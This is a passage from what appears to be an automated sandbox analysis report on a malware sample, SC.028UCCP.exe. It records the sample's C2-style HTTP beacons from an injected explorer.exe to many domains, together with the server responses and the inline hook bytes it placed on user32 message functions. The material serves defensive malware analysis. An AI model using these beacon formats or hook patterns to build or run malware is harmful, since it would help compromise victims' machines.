Mar 20, 2023 09:16:16.683263063 CET	516	OUT	GET /ms12/?hT=GAqcOfRaXYyBPpQNc1d4+pcaGBxp+bphJlxAZfzVtb5VN+LprCdBX89oplvsYdaz1A4Y&UlWl0=MBZlMJlh34CHQ HTTP/1.1 Host: www.abimpianti.ch Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 20, 2023 09:16:17.198052883 CET	517	IN	HTTP/1.1 404 Not Found Date: Mon, 20 Mar 2023 08:16:17 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.11.20	49819	142.250.185.211	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 20, 2023 09:10:13.640886068 CET	357	OUT	GET /ms12/?hT=3vbl2R1UVlik5qBB6wrenITxXeLVrWa6N7N62KRalH+vVSA16yD/agKPQdEyB3rsS7Yj&a6A8=p0GhgVm0MHDdp8m HTTP/1.1 Host: www.eliteequinewellness.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 20, 2023 09:10:13.844963074 CET	358	IN	HTTP/1.1 301 Moved Permanently Content-Type: application/binary Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Mon, 20 Mar 2023 08:10:13 GMT Location: https://www.eliteequinewellness.com/ms12/?hT=3vbl2R1UVlik5qBB6wrenITxXeLVrWa6N7N62KRalH+vVSA16yD/agKPQdEyB3rsS7Yj&a6A8=p0GhgVm0MHDdp8m Server: ESF Content-Length: 0 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.11.20	49822	188.114.97.3	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 20, 2023 09:10:34.025355101 CET	372	OUT	GET /ms12/?a6A8=p0GhgVm0MHDdp8m&hT=GEgy5f1eXaBWyRpWMBxBbWcEY1MHcvciQ8raEzEPejcDf7w8zE5rQdkYfLeQVLgbPBXb HTTP/1.1 Host: www.economjchq.space Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 20, 2023 09:10:34.042653084 CET	373	IN	HTTP/1.1 301 Moved Permanently Date: Mon, 20 Mar 2023 08:10:34 GMT Transfer-Encoding: chunked Connection: close Cache-Control: max-age=3600 Expires: Mon, 20 Mar 2023 09:10:34 GMT Location: https://www.economjchq.space/ms12/?a6A8=p0GhgVm0MHDdp8m&hT=GEgy5f1eXaBWyRpWMBxBbWcEY1MHcvciQ8raEzEPejcDf7w8zE5rQdkYfLeQVLgbPBXb Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=cPuuE5RM5oYSo047GJRgI%2BCXkh0qwxhFWMxoU8u76VtZM9kjJiz7B7ha9%2F9Rz6ErSEUSoz0moJElCja4QbKxxuQveTVutclVyz3vuejZZjxPdk3Ihmr5LJ9lRwL0dK0V5goIzHzXIA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7aac7ababa033803-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.11.20	49823	81.17.29.147	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 20, 2023 09:10:54.265433073 CET	374	OUT	GET /ms12/?hT=rKVQxN6JSordSXvKLLfEBVUre63ztGesQlGfCtix5zz1Yo/EERiTRw3ZQxg6mz/OTP1R&a6A8=p0GhgVm0MHDdp8m HTTP/1.1 Host: www.friendsofquarepianos.co.uk Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 20, 2023 09:10:54.283816099 CET	374	IN	HTTP/1.1 302 Found cache-control: max-age=0, private, must-revalidate connection: close content-length: 11 date: Mon, 20 Mar 2023 08:10:53 GMT location: http://survey-smiles.com server: nginx set-cookie: sid=bc5b9da2-c6f6-11ed-94fb-fb6d15fff516; path=/; domain=.friendsofquarepianos.co.uk; expires=Sat, 07 Apr 2091 11:25:01 GMT; max-age=2147483647; HttpOnly Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 Data Ascii: Redirecting

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.11.20	49827	142.250.186.51	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 20, 2023 09:11:35.414279938 CET	395	OUT	GET /ms12/?hT=aVqkBEdIHBWaW/lsOPNfNUdw5ZC180ox2ANf6BVSo52uRq15en0/dTfjz5sq7L16GRwO&a6A8=p0GhgVm0MHDdp8m HTTP/1.1 Host: www.arialttnr.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 20, 2023 09:11:35.433589935 CET	396	IN	HTTP/1.1 302 Found Location: https://links.emotiveapp.co/rel/ms12/?hT=aVqkBEdIHBWaW/lsOPNfNUdw5ZC180ox2ANf6BVSo52uRq15en0/dTfjz5sq7L16GRwO&a6A8=p0GhgVm0MHDdp8m Date: Mon, 20 Mar 2023 08:11:35 GMT Content-Type: text/html; charset=UTF-8 Server: ghs Content-Length: 331 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 6c 69 6e 6b 73 2e 65 6d 6f 74 69 76 65 61 70 70 2e 63 6f 2f 72 65 6c 2f 6d 73 31 32 2f 3f 68 54 3d 61 56 71 6b 42 45 64 49 48 42 57 61 57 2f 6c 73 4f 50 4e 66 4e 55 64 77 35 5a 43 31 38 30 6f 78 32 41 4e 66 36 42 56 53 6f 35 32 75 52 71 31 35 65 6e 30 2f 64 54 66 6a 7a 35 73 71 37 4c 31 36 47 52 77 4f 26 61 6d 70 3b 61 36 41 38 3d 70 30 47 68 67 56 6d 30 4d 48 44 64 70 38 6d 22 3e 68 65 72 65 3c 2f 41 3e 2e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://links.emotiveapp.co/rel/ms12/?hT=aVqkBEdIHBWaW/lsOPNfNUdw5ZC180ox2ANf6BVSo52uRq15en0/dTfjz5sq7L16GRwO&a6A8=p0GhgVm0MHDdp8m">here</A>.</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.11.20	49830	198.185.159.144	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 20, 2023 09:12:15.932254076 CET	411	OUT	GET /ms12/?hT=rnwHnBjC2B91WSvUx5IF3sWIhMPrpsyX3rQSnskEXaZlLwDtCWtuXGHAHocTRNCypERK&a6A8=p0GhgVm0MHDdp8m HTTP/1.1 Host: www.garageautosaintthomas.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 20, 2023 09:12:16.065155983 CET	412	IN	HTTP/1.1 400 Bad Request Cache-Control: no-cache, must-revalidate Content-Length: 77564 Content-Type: text/html; charset=UTF-8 Date: Mon, 20 Mar 2023 08:12:16 UTC Expires: Thu, 01 Jan 1970 00:00:00 UTC Pragma: no-cache Server: Squarespace X-Contextid: F2qcOycv/R4zdyPxS Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;
Mar 20, 2023 09:12:16.065227985 CET	413	IN	Data Raw: 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 Data Ascii: font-weight: 300; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family
Mar 20, 2023 09:12:16.065284014 CET	415	IN	Data Raw: 5a 63 36 54 67 4b 77 31 43 5a 4c 45 58 79 47 5a 76 49 55 6a 4a 54 46 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34 Data Ascii: Zc6TgKw1CZLEXyGZvIUjJTFLWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMt
Mar 20, 2023 09:12:16.065329075 CET	415	IN	Data Raw: 41 62 54 6a 45 6d 75 66 55 51 6f 51 67 41 37 52 69 72 39 61 39 68 5a 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75 Data Ascii: AbTjEmufUQoQgA7Rir9a9hZxqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+
Mar 20, 2023 09:12:16.065386057 CET	416	IN	Data Raw: 64 57 72 56 38 34 7a 76 71 7a 55 70 39 38 37 66 66 4f 71 71 2b 70 6a 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a Data Ascii: dWrV84zvqzUp987ffOqq+pj4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS
Mar 20, 2023 09:12:16.065479040 CET	418	IN	Data Raw: 73 55 74 73 78 4c 45 35 68 38 53 70 70 4e 4d 66 78 35 69 6a 57 48 70 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a Data Ascii: sUtsxLE5h8SppNMfx5ijWHpb3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFI
Mar 20, 2023 09:12:16.065567017 CET	419	IN	Data Raw: 6a 66 69 63 35 33 53 6e 75 34 72 53 74 2b 48 74 59 6a 2b 4a 76 41 47 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77 Data Ascii: jfic53Snu4rSt+HtYj+JvAGJIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2u
Mar 20, 2023 09:12:16.065639973 CET	420	IN	Data Raw: 49 73 56 6e 48 51 76 47 66 48 4a 59 2b 47 73 46 4f 76 65 49 61 4c 6b 5a 54 6f 6d 2b 43 35 70 6e 6e 30 5a 74 5a 4f 73 63 53 62 64 54 51 5a 49 5a 49 6a 7a 4e 47 71 33 6a 5a 65 59 56 58 71 62 44 42 4b 37 7a 4f 50 76 37 4e 6d 78 7a 6d 4d 43 6f 36 79 Data Ascii: IsVnHQvGfHJY+GsFOveIaLkZTom+C5pnn0ZtZOscSbdTQZIZIjzNGq3jZeYVXqbDBK7zOPv7NmxzmMCo6yxGOpqJLxQEPP8ebkh2xjxPso8Vpyed4bWtGDod5nbfYx2tE9IjIcwqDOQxCLgjqhrjJapxQj5aykZ/KjJyp8vYw2jOkioWHg6QaitbobouivfRYdGlwB0//RiIvIqLJ/al9rsfi5oavS3VijivkmceYKJ2jlOzsy3
Mar 20, 2023 09:12:16.065732002 CET	422	IN	Data Raw: 62 61 4b 64 68 59 6b 30 71 76 4f 51 56 49 71 79 6b 70 38 72 73 6c 57 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53 Data Ascii: baKdhYk0qvOQVIqykp8rslWKKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOY
Mar 20, 2023 09:12:16.065817118 CET	423	IN	Data Raw: 50 33 55 43 44 61 59 67 2f 34 41 2f 4a 38 2b 65 6d 71 41 74 30 47 53 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73 Data Ascii: P3UCDaYg/4A/J8+emqAt0GSW9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBW
Mar 20, 2023 09:12:16.195895910 CET	425	IN	Data Raw: 39 79 46 49 39 70 49 64 59 71 59 66 31 4d 41 4e 36 52 49 2b 77 53 49 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37 Data Ascii: 9yFI9pIdYqYf1MAN6RI+wSI/qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMf

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.11.20	49832	206.233.207.174	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 20, 2023 09:12:36.754558086 CET	441	OUT	GET /ms12/?a6A8=p0GhgVm0MHDdp8m&hT=i6mctz/lYNz9iKxESYWey4cK6TMKWjJsbrWHZTfqTQLBeE+tWIBGneMXWwL4vjyr8Zpy HTTP/1.1 Host: www.hospitalityhsia.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 20, 2023 09:12:36.968926907 CET	442	IN	HTTP/1.1 301 Moved Permanently Server: nginx/1.14.2 Date: Mon, 20 Mar 2023 08:12:36 GMT Content-Type: text/html Content-Length: 185 Connection: close Location: https://www.hospitalityhsia.com/ms12/?a6A8=p0GhgVm0MHDdp8m&hT=i6mctz/lYNz9iKxESYWey4cK6TMKWjJsbrWHZTfqTQLBeE+tWIBGneMXWwL4vjyr8Zpy Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.2</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.11.20	49834	217.26.48.101	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 20, 2023 09:12:57.159063101 CET	450	OUT	GET /ms12/?hT=GAqcOfRaXYyBPpQNc1d4+pcaGBxp+bphJlxAZfzVtb5VN+LprCdBX89oplvsYdaz1A4Y&a6A8=p0GhgVm0MHDdp8m HTTP/1.1 Host: www.abimpianti.ch Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 20, 2023 09:12:57.667603016 CET	450	IN	HTTP/1.1 404 Not Found Date: Mon, 20 Mar 2023 08:12:57 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.11.20	49835	165.160.15.20	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Mar 20, 2023 09:13:17.988586903 CET	451	OUT	GET /ms12/?a6A8=p0GhgVm0MHDdp8m&hT=dB2SKHnvFm/evHV5UtSyv0UoYXCrydohCzjDkTmDf/VJc0uDcAnYtxnT/Jo2TNbLuMGT HTTP/1.1 Host: www.drugtestingservices.co.uk Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Mar 20, 2023 09:13:18.179918051 CET	451	IN	HTTP/1.1 200 OK Connection: close Date: Mon, 20 Mar 2023 08:13:18 GMT Content-Length: 94 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 76 69 73 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 31 2e 31 2e 37 22 20 2f 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title></title><meta name="revised" content="1.1.7" /></head><body></body></html>

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x87 0x7E 0xE9
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x8F 0xFE 0xE9
GetMessageW	INLINE	0x48 0x8B 0xB8 0x8F 0xFE 0xE9
GetMessageA	INLINE	0x48 0x8B 0xB8 0x87 0x7E 0xE9

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: SC.028UCCP.exePID: 6716, Parent PID: 4768

General

Target ID:	0
Start time:	09:08:25
Start date:	20/03/2023
